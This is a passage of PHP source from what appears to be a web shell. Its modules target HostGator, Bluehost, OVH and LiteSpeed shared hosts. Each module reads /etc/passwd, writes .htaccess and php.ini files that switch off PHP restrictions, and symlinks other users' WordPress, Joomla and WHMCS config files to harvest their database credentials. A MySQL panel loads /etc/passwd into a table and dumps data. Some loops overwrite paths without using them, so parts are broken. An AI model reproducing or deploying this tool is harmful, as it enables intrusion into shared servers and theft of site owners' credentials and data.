  2751. echo "&nbsp;[~]&nbsp;";
  2752. echo "$consym";
  2753. echo "&nbsp;[~]</nobr>";
  2754.  
  2755. $usr=explode("\n",$_POST['user']);
  2756. $configuration=array("wp-config.ini",
  2757. "wordpress/wp-config.ini",
  2758. "configuration.ini",
  2759. "blog/wp-config.ini",
  2760. "joomla/configuration.ini",
  2761. "vb/includes/config.ini",
  2762. "includes/config.ini",
  2763. "conf_global.ini",
  2764. "inc/config.ini",
  2765. "config.ini",
  2766. "Settings.ini",
  2767. "sites/default/settings.ini",
  2768. "whm/configuration.ini",
  2769. "whmcs/configuration.ini",
  2770. "support/configuration.ini",
  2771. "whmc/WHM/configuration.ini",
  2772. "whm/WHMCS/configuration.ini",
  2773. "whm/whmcs/configuration.ini",
  2774. "support/configuration.ini",
  2775. "clients/configuration.ini",
  2776. "client/configuration.ini",
  2777. "clientes/configuration.ini",
  2778. "cliente/configuration.ini",
  2779. "clientsupport/configuration.ini",
  2780. "billing/configuration.ini",
  2781. "admin/config.ini");
  2782. foreach($usr as $uss ){
  2783. $us=trim($uss);
  2784. foreach($configuration as $c){
  2785. $rs="/home/".$us."/public_html/".$c;
  2786. $r="HOSTGATOR/".$us."~".$c;
  2787. symlink($rs,$r);
  2788. }
  2789. }
  2790. }
  2791. ?>
  2792.  
  2793. <?php }
  2794. // x=bluehost
  2795. elseif(isset($_GET['x']) && ($_GET['x'] == 'bluehost')){
  2796. // symlink bluehost + config killer
  2797. ?>
  2798. <form action="?dm=<?php echo $pwd; ?>&amp;x=bluehost" method="post">
  2799. <?php
  2800. $head = '
  2801. <html>
  2802. <head><title>BLUEHOST</title>
  2803. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  2804. <script language=\'javascript\'>
  2805. function hide_div(id){
  2806. document.getElementById(id).style.display = \'none\';
  2807. document.cookie=id+\'=0;\';
  2808. }
  2809.  
  2810. function show_div(id){
  2811. document.getElementById(id).style.display = \'block\';
  2812. document.cookie=id+\'=1;\';
  2813. }
  2814.  
  2815. function change_divst(id){
  2816. if (document.getElementById(id).style.display == \'none\')
  2817. show_div(id);
  2818. else
  2819. hide_div(id);
  2820. }
  2821. </script>'; ?>
  2822. <html>
  2823. <head>
  2824. <?php echo $head; ?>
  2825. <body bgcolor=black>
  2826. <center><br/><br/>
  2827. <img src="http://www.ananova.com/wp-content/uploads/2013/04/bluehost-review-by-toptenhostings.jpg">
  2828. <form method=post><br/><br/><nobr><b><span class='b7'>O=:[ BLUEHOST</span> <span class='b8'>TOOLS ]:=O</span></b></nobr><br/><br/>
  2829. <p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
  2830.  
  2831. <?php
  2832. if(isset($_POST['usre'])){
  2833. ?>
  2834. <form method=post>
  2835. <textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd");
  2836. foreach($users as $user){
  2837. $str=explode(":",$user);
  2838. echo $str[0]."\n";
  2839. }
  2840. ?></textarea><br><br>
  2841. <input type=submit style=color:#FF0000;background-color:#000000 name=su value="./EXECUTE" /></form><br/>
  2842. <?php } ?>
  2843. <?php
  2844. error_reporting(0);
  2845. echo "<font color=white size=2 face=\"comic sans ms\">";
  2846. if(isset($_POST['su'])){
  2847. mkdir('bluehost',0777);
  2848. $rr = "AllowOverride All None \n
  2849. DirectoryIndex index.html index.htm index.php index.php4 index.php5 \n
  2850. AddType application/octet-stream .php \n
  2851. AddHandler server-parsed .php \n
  2852. Addhandler cgi-script .asp \n
  2853. AddType ini .php \n
  2854. AddHandler ini .php";
  2855. $g = fopen('bluehost/.htaccess','w');
  2856. fwrite($g,$rr);
  2857. $dm = symlink("/","bluehost/dm.ini");
  2858. $rt="<a href=bluehost/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>";
  2859. echo "<nobr>[~]&nbsp;";
  2860. echo "$rt";
  2861.  
  2862. $dir=mkdir('BLUEHOST',0777);
  2863. $r = "Options all \n DirectoryIndex Sux.html \n
  2864. AddType text/plain .php \n
  2865. AddHandler server-parsed .php \n
  2866. AddType text/plain .html \n
  2867. AddHandler txt .html \n
  2868. Require None \n
  2869. Satisfy Any";
  2870. $f = fopen('BLUEHOST/.htaccess','w');
  2871. fwrite($f,$r);
  2872. $consym="<a href=BLUEHOST/><span class='b11'>[ CONFIG KILLER ]</span></b></a>";
  2873. echo "&nbsp;[~]&nbsp;";
  2874. echo "$consym";
  2875. echo "&nbsp;[~]</nobr>";
  2876.  
  2877. $usr=explode("\n",$_POST['user']);
  2878. $configuration=array("wp-config.ini",
  2879. "wordpress/wp-config.ini",
  2880. "configuration.ini",
  2881. "blog/wp-config.ini",
  2882. "joomla/configuration.ini",
  2883. "vb/includes/config.ini",
  2884. "includes/config.ini",
  2885. "conf_global.ini",
  2886. "inc/config.ini",
  2887. "config.ini",
  2888. "Settings.ini",
  2889. "sites/default/settings.ini",
  2890. "whm/configuration.ini",
  2891. "whmcs/configuration.ini",
  2892. "support/configuration.ini",
  2893. "whmc/WHM/configuration.ini",
  2894. "whm/WHMCS/configuration.ini",
  2895. "whm/whmcs/configuration.ini",
  2896. "support/configuration.ini",
  2897. "clients/configuration.ini",
  2898. "client/configuration.ini",
  2899. "clientes/configuration.ini",
  2900. "cliente/configuration.ini",
  2901. "clientsupport/configuration.ini",
  2902. "billing/configuration.ini",
  2903. "admin/config.ini");
  2904.  
  2905. foreach($usr as $uss ){
  2906. $us=trim($uss);
  2907. foreach($configuration as $c){
  2908. $rs="/home/".$us."/public_html/".$c;
  2909. $rs="/home1/".$us."/public_html/".$c;
  2910. $rs="/home2/".$us."/public_html/".$c;
  2911. $rs="/home3/".$us."/public_html/".$c;
  2912. $rs="/home4/".$us."/public_html/".$c;
  2913. $rs="/home5/".$us."/public_html/".$c;
  2914. $rs="/home6/".$us."/public_html/".$c;
  2915. $rs="/home7/".$us."/public_html/".$c;
  2916. $rs="/home8/".$us."/public_html/".$c;
  2917. $r="BLUEHOST/".$us."~".$c;
  2918. symlink($rs,$r);
  2919. }
  2920. }
  2921. }
  2922. ?>
  2923. <?php }
  2924. // x=ovh
  2925. elseif(isset($_GET['x']) && ($_GET['x'] == 'ovh')){
  2926. // symlink ovh + config killer
  2927. ?>
  2928. <form action="?dm=<?php echo $pwd; ?>&amp;x=ovh" method="post">
  2929. <?php
  2930. $head = '
  2931. <html>
  2932. <head><title>OVH</title>
  2933. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  2934. <script language=\'javascript\'>
  2935. function hide_div(id){
  2936. document.getElementById(id).style.display = \'none\';
  2937. document.cookie=id+\'=0;\';
  2938. }
  2939.  
  2940. function show_div(id){
  2941. document.getElementById(id).style.display = \'block\';
  2942. document.cookie=id+\'=1;\';
  2943. }
  2944.  
  2945. function change_divst(id){
  2946. if (document.getElementById(id).style.display == \'none\')
  2947. show_div(id);
  2948. else
  2949. hide_div(id);
  2950. }
  2951. </script>'; ?>
  2952. <html>
  2953. <head>
  2954. <?php echo $head; ?>
  2955. <body bgcolor=black><center><br/><br/><img src="http://alsace-international.eu/IMG/LOGOS/Entreprises/OVH_Logo.gif">
  2956. <form method=post><br/><br/>
  2957. <nobr><b><span class='b7'>O=:[ OVH</span> <span class='b8'>TOOLS ]:=O</span></b></nobr><br/><br/>
  2958. <p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
  2959.  
  2960. <?php
  2961. if(isset($_POST['usre'])){
  2962. ?>
  2963. <form method=post>
  2964. <textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd");
  2965. foreach($users as $user){
  2966. $str=explode(":",$user);
  2967. echo $str[0]."\n";
  2968. }
  2969. ?></textarea><br><br>
  2970. <input type=submit style=color:#FF0000;background-color:#000000 name=su value="./EXECUTE" /></form><br/>
  2971. <?php } ?>
  2972.  
  2973. <?php
  2974. error_reporting(0);
  2975. if(isset($_POST['su'])){
  2976. mkdir('ovh',0777);
  2977. $r = "AllowOverride All None \n
  2978. DirectoryIndex index.html index.htm index.php index.php4 index.php5 \n
  2979. AddType application/octet-stream .php \n
  2980. AddHandler server-parsed .php \n
  2981. Addhandler cgi-script .asp \n
  2982. AddType ini .php \n
  2983. AddHandler ini .php";
  2984. $g = fopen('ovh/.htaccess','w');
  2985. fwrite($g,$rr);
  2986. $dm = symlink("/","ovh/dm.ini");
  2987. $rt="<a href=ovh/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>";
  2988. echo "<nobr>[~]&nbsp;";
  2989. echo "$rt";
  2990.  
  2991. $dir=mkdir('OVH',0777);
  2992. $rr = "Safe_mode = OFF \n
  2993. Disable_functions = NONE \n
  2994. Open_basedir = OFF";
  2995. $f = fopen('OVH/php.ini','w');
  2996. fwrite($f,$rr);
  2997.  
  2998. $rrr = "AllowOverride All None \n
  2999. DirectoryIndex index.html index.htm index.php index.php4 index.php5 \n
  3000. AddType application/octet-stream .php \n
  3001. AddHandler server-parsed .php \n
  3002. AddHandler cgi-script .asp \n
  3003. AddType ini .php \n
  3004. AddHandler ini .php";
  3005. $ff = fopen('OVH/.htaccess','w');
  3006. fwrite($ff,$rrr);
  3007.  
  3008. $consym="<a href=OVH/>
  3009. <span class='b11'>[ CONFIG KILLER ]</span></b></a>";
  3010. echo "&nbsp;[~]&nbsp;";
  3011. echo "$consym";
  3012. echo "&nbsp;[~]</nobr>";
  3013.  
  3014. $usr=explode("\n",$_POST['user']);
  3015. $configuration=array("wp-config.ini",
  3016. "wordpress/wp-config.ini",
  3017. "configuration.ini",
  3018. "blog/wp-config.ini",
  3019. "joomla/configuration.ini",
  3020. "vb/includes/config.ini",
  3021. "includes/config.ini",
  3022. "conf_global.ini",
  3023. "inc/config.ini",
  3024. "config.ini",
  3025. "Settings.ini",
  3026. "sites/default/settings.ini",
  3027. "whm/configuration.ini",
  3028. "whmcs/configuration.ini",
  3029. "support/configuration.ini",
  3030. "whmc/WHM/configuration.ini",
  3031. "whm/WHMCS/configuration.ini",
  3032. "whm/whmcs/configuration.ini",
  3033. "support/configuration.ini",
  3034. "clients/configuration.ini",
  3035. "client/configuration.ini",
  3036. "clientes/configuration.ini",
  3037. "cliente/configuration.ini",
  3038. "clientsupport/configuration.ini",
  3039. "billing/configuration.ini",
  3040. "admin/config.ini");
  3041. foreach($usr as $uss ){
  3042. $us=trim($uss);
  3043. foreach($configuration as $c){
  3044. $rs="/homez.0/".$us."/www/".$c;
  3045. $rs="/homez.1/".$us."/www/".$c;
  3046. $rs="/homez.2/".$us."/www/".$c;
  3047. $rs="/homez.3/".$us."/www/".$c;
  3048. $rs="/homez.4/".$us."/www/".$c;
  3049. $rs="/homez.5/".$us."/www/".$c;
  3050. $rs="/homez.6/".$us."/www/".$c;
  3051. $rs="/homez.7/".$us."/www/".$c;
  3052. $rs="/homez.8/".$us."/www/".$c;
  3053. $rs="/homez.9/".$us."/www/".$c;
  3054. $rs="/homez.10/".$us."/www/".$c;
  3055. $rs="/homez.11/".$us."/www/".$c;
  3056. $rs="/homez.12/".$us."/www/".$c;
  3057. $rs="/homez.13/".$us."/www/".$c;
  3058. $rs="/homez.14/".$us."/www/".$c;
  3059. $rs="/homez.15/".$us."/www/".$c;
  3060. $rs="/homez.16/".$us."/www/".$c;
  3061. $rs="/homez.17/".$us."/www/".$c;
  3062. $rs="/homez.18/".$us."/www/".$c;
  3063. $rs="/homez.19/".$us."/www/".$c;
  3064. $rs="/homez.20/".$us."/www/".$c;
  3065. $rs="/homez.21/".$us."/www/".$c;
  3066. $rs="/homez.22/".$us."/www/".$c;
  3067. $rs="/homez.23/".$us."/www/".$c;
  3068. $rs="/homez.24/".$us."/www/".$c;
  3069. $rs="/homez.25/".$us."/www/".$c;
  3070. $rs="/homez.26/".$us."/www/".$c;
  3071. $rs="/homez.27/".$us."/www/".$c;
  3072. $rs="/homez.28/".$us."/www/".$c;
  3073. $rs="/homez.29/".$us."/www/".$c;
  3074. $rs="/homez.30/".$us."/www/".$c;
  3075. $rs="/homez.31/".$us."/www/".$c;
  3076. $rs="/homez.32/".$us."/www/".$c;
  3077. $rs="/homez.33/".$us."/www/".$c;
  3078. $rs="/homez.34/".$us."/www/".$c;
  3079. $rs="/homez.35/".$us."/www/".$c;
  3080. $rs="/homez.36/".$us."/www/".$c;
  3081. $rs="/homez.37/".$us."/www/".$c;
  3082. $rs="/homez.38/".$us."/www/".$c;
  3083. $rs="/homez.39/".$us."/www/".$c;
  3084. $rs="/homez.40/".$us."/www/".$c;
  3085. $rs="/homez.41/".$us."/www/".$c;
  3086. $rs="/homez.42/".$us."/www/".$c;
  3087. $rs="/homez.43/".$us."/www/".$c;
  3088. $rs="/homez.44/".$us."/www/".$c;
  3089. $rs="/homez.45/".$us."/www/".$c;
  3090. $rs="/homez.46/".$us."/www/".$c;
  3091. $rs="/homez.47/".$us."/www/".$c;
  3092. $rs="/homez.48/".$us."/www/".$c;
  3093. $rs="/homez.49/".$us."/www/".$c;
  3094. $rs="/homez.50/".$us."/www/".$c;
  3095. $rs="/homez.51/".$us."/www/".$c;
  3096. $rs="/homez.52/".$us."/www/".$c;
  3097. $rs="/homez.53/".$us."/www/".$c;
  3098. $rs="/homez.54/".$us."/www/".$c;
  3099. $rs="/homez.55/".$us."/www/".$c;
  3100. $rs="/homez.56/".$us."/www/".$c;
  3101. $rs="/homez.57/".$us."/www/".$c;
  3102. $rs="/homez.58/".$us."/www/".$c;
  3103. $rs="/homez.59/".$us."/www/".$c;
  3104. $rs="/homez.60/".$us."/www/".$c;
  3105. $rs="/homez.61/".$us."/www/".$c;
  3106. $rs="/homez.62/".$us."/www/".$c;
  3107. $rs="/homez.63/".$us."/www/".$c;
  3108. $rs="/homez.64/".$us."/www/".$c;
  3109. $rs="/homez.65/".$us."/www/".$c;
  3110. $rs="/homez.66/".$us."/www/".$c;
  3111. $rs="/homez.67/".$us."/www/".$c;
  3112. $rs="/homez.68/".$us."/www/".$c;
  3113. $rs="/homez.69/".$us."/www/".$c;
  3114. $rs="/homez.70/".$us."/www/".$c;
  3115. $rs="/homez.71/".$us."/www/".$c;
  3116. $rs="/homez.72/".$us."/www/".$c;
  3117. $rs="/homez.73/".$us."/www/".$c;
  3118. $rs="/homez.74/".$us."/www/".$c;
  3119. $rs="/homez.75/".$us."/www/".$c;
  3120. $rs="/homez.76/".$us."/www/".$c;
  3121. $rs="/homez.77/".$us."/www/".$c;
  3122. $rs="/homez.78/".$us."/www/".$c;
  3123. $rs="/homez.79/".$us."/www/".$c;
  3124. $rs="/homez.80/".$us."/www/".$c;
  3125. $rs="/homez.81/".$us."/www/".$c;
  3126. $rs="/homez.82/".$us."/www/".$c;
  3127. $rs="/homez.83/".$us."/www/".$c;
  3128. $rs="/homez.84/".$us."/www/".$c;
  3129. $rs="/homez.85/".$us."/www/".$c;
  3130. $rs="/homez.86/".$us."/www/".$c;
  3131. $rs="/homez.87/".$us."/www/".$c;
  3132. $rs="/homez.88/".$us."/www/".$c;
  3133. $rs="/homez.89/".$us."/www/".$c;
  3134. $rs="/homez.100/".$us."/www/".$c;
  3135. $rs="/homez.101/".$us."/www/".$c;
  3136. $rs="/homez.102/".$us."/www/".$c;
  3137. $rs="/homez.103/".$us."/www/".$c;
  3138. $rs="/homez.104/".$us."/www/".$c;
  3139. $rs="/homez.105/".$us."/www/".$c;
  3140. $rs="/homez.106/".$us."/www/".$c;
  3141. $rs="/homez.107/".$us."/www/".$c;
  3142. $rs="/homez.108/".$us."/www/".$c;
  3143. $rs="/homez.109/".$us."/www/".$c;
  3144. $rs="/homez.110/".$us."/www/".$c;
  3145. $rs="/homez.111/".$us."/www/".$c;
  3146. $rs="/homez.112/".$us."/www/".$c;
  3147. $rs="/homez.113/".$us."/www/".$c;
  3148. $rs="/homez.114/".$us."/www/".$c;
  3149. $rs="/homez.115/".$us."/www/".$c;
  3150. $rs="/homez.116/".$us."/www/".$c;
  3151. $rs="/homez.117/".$us."/www/".$c;
  3152. $rs="/homez.118/".$us."/www/".$c;
  3153. $rs="/homez.119/".$us."/www/".$c;
  3154. $rs="/homez.120/".$us."/www/".$c;
  3155. $rs="/homez.121/".$us."/www/".$c;
  3156. $rs="/homez.122/".$us."/www/".$c;
  3157. $rs="/homez.123/".$us."/www/".$c;
  3158. $rs="/homez.124/".$us."/www/".$c;
  3159. $rs="/homez.125/".$us."/www/".$c;
  3160. $rs="/homez.126/".$us."/www/".$c;
  3161. $rs="/homez.127/".$us."/www/".$c;
  3162. $rs="/homez.128/".$us."/www/".$c;
  3163. $rs="/homez.129/".$us."/www/".$c;
  3164. $rs="/homez.130/".$us."/www/".$c;
  3165. $r="OVH/".$us."~".$c; symlink($rs,$r);
  3166. }
  3167. }
  3168. }
  3169. ?>
  3170.  
  3171. <?php }
  3172. // x=litespeed
  3173. elseif(isset($_GET['x']) && ($_GET['x'] == 'litespeed')){
  3174. // symlink litespeed-nginx + config killer
  3175. ?>
  3176. <form action="?dm=<?php echo $pwd; ?>&amp;x=litespeed" method="post">
  3177. <?php
  3178. $head = '
  3179. <html>
  3180. <head>
  3181. </script>
  3182. <title>LITESPEED - APACHE</title>
  3183. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  3184. <script language=\'javascript\'>
  3185. function hide_div(id)
  3186. {
  3187. document.getElementById(id).style.display = \'none\';
  3188. document.cookie=id+\'=0;\';
  3189. }
  3190. function show_div(id)
  3191. {
  3192. document.getElementById(id).style.display = \'block\';
  3193. document.cookie=id+\'=1;\';
  3194. }
  3195. function change_divst(id)
  3196. {
  3197. if (document.getElementById(id).style.display == \'none\')
  3198. show_div(id);
  3199. else
  3200. hide_div(id);
  3201. }
  3202. </script>'; ?>
  3203. <html>
  3204. <head>
  3205. <?php echo $head; ?>
  3206. <body bgcolor=black><center><br/><br/> <img src="http://www.ftt.co.uk/images/nginx.png"><br/><img src="http://www.litespeedtech.com/images/litespeed/Subpage_misc/LSWS_logo.png">
  3207. <form method=post><br/><br/>
  3208. <nobr><b><span class='b7'>O=:[ LITESPEED - NGINX</span> <span class='b8'>TOOLS ]:=O</span></b></nobr><br/><br/>
  3209. <p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
  3210.  
  3211. <?php
  3212. if(isset($_POST['usre'])){
  3213. ?>
  3214. <form method=post>
  3215. <textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd");
  3216. foreach($users as $user)
  3217. {
  3218. $str=explode(":",$user);
  3219. echo $str[0]."\n";
  3220. }
  3221.  
  3222. ?></textarea><br><br>
  3223. <input type=submit style=color:#FF0000;background-color:#000000 name=su value="EXECUTE" /></form><br/>
  3224. <?php } ?>
  3225.  
  3226. <?php
  3227. error_reporting(0);
  3228. if(isset($_POST['su'])){
  3229. mkdir('litespeed',0777);
  3230. $rr = "Options +FollowSymlinks \r
  3231. Options +IncludesNoExec -ExecCGI \r
  3232. DirectoryIndex index.html index.shtml index.htm index.php \r
  3233. RemoveHandler .php \r
  3234. AddType text/html .shtml \r
  3235. AddType application/octet-stream .php \r
  3236. AddHandler server-parsed .shtml";
  3237. $g = fopen('litespeed/.htaccess','w');
  3238. fwrite($g,$rr);
  3239. $dm = symlink("/","litespeed/dm.shtml");
  3240. $rt="<a href=litespeed/dm.shtml><b><span class='b11'>[ SYMLINK ]</span></b></a>";
  3241. echo "<nobr>[~]&nbsp;";
  3242. echo "$rt";
  3243.  
  3244. $dir=mkdir('LITESPEED',0777);
  3245. $r = "Options +FollowSymlinks \r
  3246. Options +IncludesNoExec -ExecCGI \r
  3247. DirectoryIndex index.html index.shtml index.htm index.php \r
  3248. RemoveHandler .php \r
  3249. AddType text/html .shtml \r
  3250. AddType application/octet-stream .php \r
  3251. AddHandler server-parsed .shtml";
  3252. $f = fopen('LITESPEED/.htaccess','w');
  3253. fwrite($f,$r);
  3254. $consym="<a href=LITESPEED/><b><span class='b11'>[ CONFIG KILLER ]</span></b> </a>";
  3255. echo "&nbsp;[~]&nbsp;";
  3256. echo "$consym";
  3257. echo "&nbsp;[~]</nobr>";
  3258.  
  3259. $usr=explode("\n",$_POST['user']);
  3260. $configuration=array(
  3261. "aksi.php",
  3262. "aksi.php.old",
  3263. "aksi.php.bak",
  3264. "conf.php",
  3265. "conf.php.old",
  3266. "conf.php.bak",
  3267. "conf_global.php",
  3268. "conf_global.php.old",
  3269. "conf_global.php.bak",
  3270. "config.php",
  3271. "config.php.old",
  3272. "config.php.bak",
  3273. "configuration.php",
  3274. "configuration.php.old",
  3275. "configuration.php.bak",
  3276. "conn.php",
  3277. "conn.php.old",
  3278. "conn.php.bak",
  3279. "connect.php",
  3280. "connect.php.old",
  3281. "connect.php.bak",
  3282. "connection.php",
  3283. "connection.php.old",
  3284. "connection.php.bak",
  3285. "db.php",
  3286. "db.php.old",
  3287. "db.php.bak",
  3288. "database.php",
  3289. "database.php.old",
  3290. "database.php.bak",
  3291. "inc.php",
  3292. "inc.php.old",
  3293. "inc.php.bak",
  3294. "koneksi.php",
  3295. "koneksi.php.old",
  3296. "koneksi.php.bak",
  3297. "mysql.php",
  3298. "myqsl.php.old",
  3299. "mysql.php.bak",
  3300. "setting.php",
  3301. "setting.php.old",
  3302. "setting.php.bak",
  3303. "Settings.php",
  3304. "Settings.php.old",
  3305. "Settings.php.bak",
  3306. "sql.php",
  3307. "sql.php.old",
  3308. "sql.php.bak");
  3309. foreach($usr as $uss ){
  3310. $us=trim($uss);
  3311. foreach($configuration as $c){
  3312. $rs="/home/".$us."/public_html/".$c;
  3313. $r="LITESPEED/".$us."~".$c;
  3314. symlink($rs,$r);
  3315. }
  3316. }
  3317. }
  3318. ?>
  3319.  
  3320.  
  3321. <?php }
  3322. // x=mysql1
  3323. elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql1')) {
  3324.  
  3325. if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])) {
  3326. $sqlhost = $_GET['sqlhost'];
  3327. $sqluser = $_GET['sqluser'];
  3328. $sqlpass = $_GET['sqlpass'];
  3329. $sqlport = $_GET['sqlport'];
  3330. if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){
  3331. $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
  3332. $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
  3333. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?dm=".$pwd."&amp;x=mysql&amp;
  3334.  
  3335. sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  3336. sqlpass=".$sqlpass."&amp;
  3337. sqlport=".$sqlport."&amp;\">[ databases ]</a>";
  3338. if(isset($_GET['db']))
  3339. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;
  3340. <a href=\"dm=".$pwd."&amp;x=mysql&amp;
  3341. sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  3342. sqlpass=".$sqlpass."&amp;
  3343. sqlport=".$sqlport."&amp;
  3344. db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
  3345. if(isset($_GET['table']))
  3346. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"dm=".$pwd."&amp;x=mysql&amp;
  3347. sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  3348. sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;
  3349. db=".$_GET['db']."&amp;
  3350. table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
  3351. $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
  3352. $msg .= "</div>";
  3353. echo $msg;
  3354. if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){
  3355. $db = $_GET['db'];
  3356. $query = "DROP TABLE IF EXISTS dm0_table; \nCREATE TABLE `dm0_table` ( `file` LONGBLOB NOT NULL ); \nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Z3r0Z3r0_table;SELECT * FROM dm0_table; \nDROP TABLE IF EXISTS dm_table;";
  3357.  
  3358. $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"><input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
  3359. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  3360. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  3361. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  3362. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  3363. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  3364. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  3365. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
  3366. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  3367. </form>
  3368. </div> ";
  3369. $tables = array();
  3370. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>";
  3371. $hasil = @mysql_list_tables($db,$con);
  3372. while(list($table) = @mysql_fetch_row($hasil)){
  3373. @array_push($tables,$table);
  3374. }
  3375. @sort($tables);
  3376. foreach($tables as $table){
  3377. $msg .= "<tr><td><a href=\"?dm=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>";
  3378. }
  3379. $msg .= "</table>";
  3380. }
  3381. elseif(isset($_GET['table']) && (!isset($_GET['sqlquery'])))
  3382. {
  3383. $db = $_GET['db'];
  3384. $table = $_GET['table'];
  3385. $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";
  3386. $msgq = "<div style=\"width:99%;padding:0 10px;\">
  3387. <form action=\"?\" method=\"get\">
  3388. <input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
  3389. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  3390. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  3391. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  3392. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  3393. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  3394. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  3395. <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  3396. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  3397. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  3398. </form></div> ";
  3399.  
  3400. $columns = array();
  3401. $msg = "<table class=\"explore\" style=\"width:99%;\">";
  3402. $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);
  3403. while(list($column) = @mysql_fetch_row($hasil)){
  3404. $msg .= "<th>$column</th>"; $kolum = $column;
  3405. }
  3406. $msg .= "</tr>";
  3407. $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
  3408. list($total) = mysql_fetch_row($hasil);
  3409.  
  3410. if(isset($_GET['z'])) $page = (int) $_GET['z'];
  3411. else $page = 1;
  3412. $pagenum = 100;
  3413. $totpage = ceil($total / $pagenum);
  3414. $start = (($page - 1) * $pagenum);
  3415. $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
  3416. while($datas = @mysql_fetch_assoc($hasil)){
  3417. $msg .= "<tr>";
  3418. foreach($datas as $data){ if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; }
  3419. $msg .= "</tr>";
  3420. }
  3421. $msg .= "</table>";
  3422. $head = "<div style=\"padding:10px 0 0 6px;\"><form action=\"?\" method=\"get\">
  3423. <input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
  3424. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  3425. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  3426. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  3427. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  3428. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  3429. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  3430. <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  3431. Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
  3432. for($i = 1;$i <= $totpage;$i++){
  3433. $head .= "<option value=\"".$i."\">".$i."</option>";
  3434. if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>";
  3435. }
  3436. $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
  3437. $msg = $msgq.$head.$msg;
  3438. }
  3439. elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){
  3440. $db = $_GET['db'];
  3441. $query = magicboom($_GET['sqlquery']);
  3442. $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\">
  3443. <input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
  3444. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
